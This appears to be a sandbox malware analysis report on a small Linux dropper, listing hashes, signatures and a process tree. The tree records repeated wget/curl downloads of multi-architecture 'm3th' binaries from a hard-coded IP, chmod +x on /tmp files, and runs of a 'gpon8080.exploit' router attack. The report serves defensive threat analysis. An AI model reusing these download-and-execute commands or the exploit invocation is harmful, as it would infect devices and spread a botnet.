Analysis
- max time kernel: 80s
- max time network: 128s
- platform: ubuntu-18.04_amd64
- resource: ubuntu1804-amd64-20240729-en
- resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20240729-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
- submitted: 28-07-2024 16:40
Static task
- static1
Behavioral tasks
- behavioral1: sample 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118, resource ubuntu1804-amd64-20240729-en
- behavioral2: sample 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118, resource debian9-armhf-20240729-en
- behavioral3: sample 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118, resource debian9-mipsbe-20240729-en
- behavioral4: sample 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118, resource debian9-mipsel-20240729-en
General
- Target: 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
- Size: 3KB
- MD5: 17f41b4b65e5ddad4a76594560d43927
- SHA1: bb7691396c850ff2b4645b90336852650aa26eb6
- SHA256: 36c3310e8853358d2d68f7b1f0ebd3b52f9691f58286799d1a7b9413903d5588
- SHA512: 602d2b3fda5948c263ab2c48f96993daf5ef404faec82cb2e7f55eae7c8dbed3525b6715f537629d7299c3f4e43077bcf1429b81375e7b2e16f398768920b322
Malware Config
Signatures
- Executes dropped EXE (13 IoCs)
  Processes:
  ioc         | pid  | process
  /tmp/g0away | 1510 | g0away
  /tmp/g0away | 1516 | g0away
  /tmp/g0away | 1522 | g0away
  /tmp/g0away | 1528 | g0away
  /tmp/g0away | 1536 | g0away
  /tmp/g0away | 1542 | g0away
  /tmp/g0away | 1548 | g0away
  /tmp/g0away | 1554 | g0away
  /tmp/g0away | 1560 | g0away
  /tmp/g0away | 1566 | g0away
  /tmp/g0away | 1572 | g0away
  /tmp/g0away | 1578 | g0away
  /tmp/g0away | 1584 | g0away
- Writes file to tmp directory (1 IoC)
  Malware often drops required files in the /tmp directory.
  Processes:
  description                  | ioc         | process
  File opened for modification | /tmp/g0away | 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
Processes
- /tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 (PID 1502)
  Command: /tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
  Signatures: Writes file to tmp directory
  - /usr/bin/wget (PID 1503)
    Command: wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86
  - /usr/bin/curl (PID 1507)
    Command: curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86
  - /bin/cat (PID 1508)
    Command: cat m3th.x86
  - /bin/chmod (PID 1509)
    Command: chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-timedated.service-YpXBgT
  - /tmp/g0away (PID 1510)
    Command: ./g0away gpon8080.exploit
    Signatures: Executes dropped EXE
  - /usr/bin/wget (PID 1512)
    Command: wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips
  - /usr/bin/curl (PID 1513)
    Command: curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips
  - /bin/cat (PID 1514)
    Command: cat m3th.mips
  - /bin/chmod (PID 1515)
    Command: chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-timedated.service-YpXBgT
  - /tmp/g0away (PID 1516)
    Command: ./g0away gpon8080.exploit
    Signatures: Executes dropped EXE
  - /usr/bin/wget (PID 1518)
    Command: wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl
  - /usr/bin/curl (PID 1519)
    Command: curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl
  - /bin/cat (PID 1520)
    Command: cat m3th.mpsl
  - /bin/chmod (PID 1521)
    Command: chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-timedated.service-YpXBgT
  - /tmp/g0away (PID 1522)
    Command: ./g0away gpon8080.exploit
    Signatures: Executes dropped EXE
  - /usr/bin/wget (PID 1524)
    Command: wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm
  - /usr/bin/curl (PID 1525)
    Command: curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm
  - /bin/cat (PID 1526)
    Command: cat m3th.arm
  - /bin/chmod (PID 1527)
    Command: chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-timedated.service-YpXBgT
  - /tmp/g0away (PID 1528)
    Command: ./g0away gpon8080.exploit
    Signatures: Executes dropped EXE
  - /usr/bin/wget (PID 1530)
    Command: wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5
  - /usr/bin/curl (PID 1531)
    Command: curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5
  - /bin/cat (PID 1534)
    Command: cat m3th.arm5
  - /bin/chmod (PID 1535)
    Command: chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja
  - /tmp/g0away (PID 1536)
    Command: ./g0away gpon8080.exploit
    Signatures: Executes dropped EXE
  - /usr/bin/wget (PID 1538)
    Command: wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6
  - /usr/bin/curl (PID 1539)
    Command: curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6
  - /bin/cat (PID 1540)
    Command: cat m3th.arm6
  - /bin/chmod (PID 1541)
    Command: chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja
  - /tmp/g0away (PID 1542)
    Command: ./g0away gpon8080.exploit
    Signatures: Executes dropped EXE
  - /usr/bin/wget (PID 1544)
    Command: wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7
  - /usr/bin/curl (PID 1545)
    Command: curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7
  - /bin/cat (PID 1546)
    Command: cat m3th.arm7
  - /bin/chmod (PID 1547)
    Command: chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja
  - /tmp/g0away (PID 1548)
    Command: ./g0away gpon8080.exploit
    Signatures: Executes dropped EXE
  - /usr/bin/wget (PID 1550)
    Command: wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc
  - /usr/bin/curl (PID 1551)
    Command: curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc
  - /bin/cat (PID 1552)
    Command: cat m3th.ppc
  - /bin/chmod (PID 1553)
    Command: chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja
  - /tmp/g0away (PID 1554)
    Command: ./g0away gpon8080.exploit
    Signatures: Executes dropped EXE
  - /usr/bin/wget (PID 1556)
    Command: wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k
  - /usr/bin/curl (PID 1557)
    Command: curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k
  - /bin/cat (PID 1558)
    Command: cat m3th.m68k
  - /bin/chmod (PID 1559)
    Command: chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja
  - /tmp/g0away (PID 1560)
    Command: ./g0away gpon8080.exploit
    Signatures: Executes dropped EXE
  - /usr/bin/wget (PID 1562)
    Command: wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc
  - /usr/bin/curl (PID 1563)
    Command: curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc
  - /bin/cat (PID 1564)
    Command: cat m3th.spc
  - /bin/chmod (PID 1565)
    Command: chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja
  - /tmp/g0away (PID 1566)
    Command: ./g0away gpon8080.exploit
    Signatures: Executes dropped EXE
  - /usr/bin/wget (PID 1568)
    Command: wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686
  - /usr/bin/curl (PID 1569)
    Command: curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686
  - /bin/cat (PID 1570)
    Command: cat m3th.i686
  - /bin/chmod (PID 1571)
    Command: chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja
  - /tmp/g0away (PID 1572)
    Command: ./g0away gpon8080.exploit
    Signatures: Executes dropped EXE
  - /usr/bin/wget (PID 1574)
    Command: wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh4
  - /usr/bin/curl (PID 1575)
    Command: curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh4
  - /bin/cat (PID 1576)
    Command: cat m3th.sh4
  - /bin/chmod (PID 1577)
    Command: chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja
  - /tmp/g0away (PID 1578)
    Command: ./g0away gpon8080.exploit
    Signatures: Executes dropped EXE
  - /usr/bin/wget (PID 1580)
    Command: wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc
  - /usr/bin/curl (PID 1581)
    Command: curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc
  - /bin/cat (PID 1582)
    Command: cat m3th.arc
  - /bin/chmod (PID 1583)
    Command: chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja
  - /tmp/g0away (PID 1584)
    Command: ./g0away gpon8080.exploit
    Signatures: Executes dropped EXE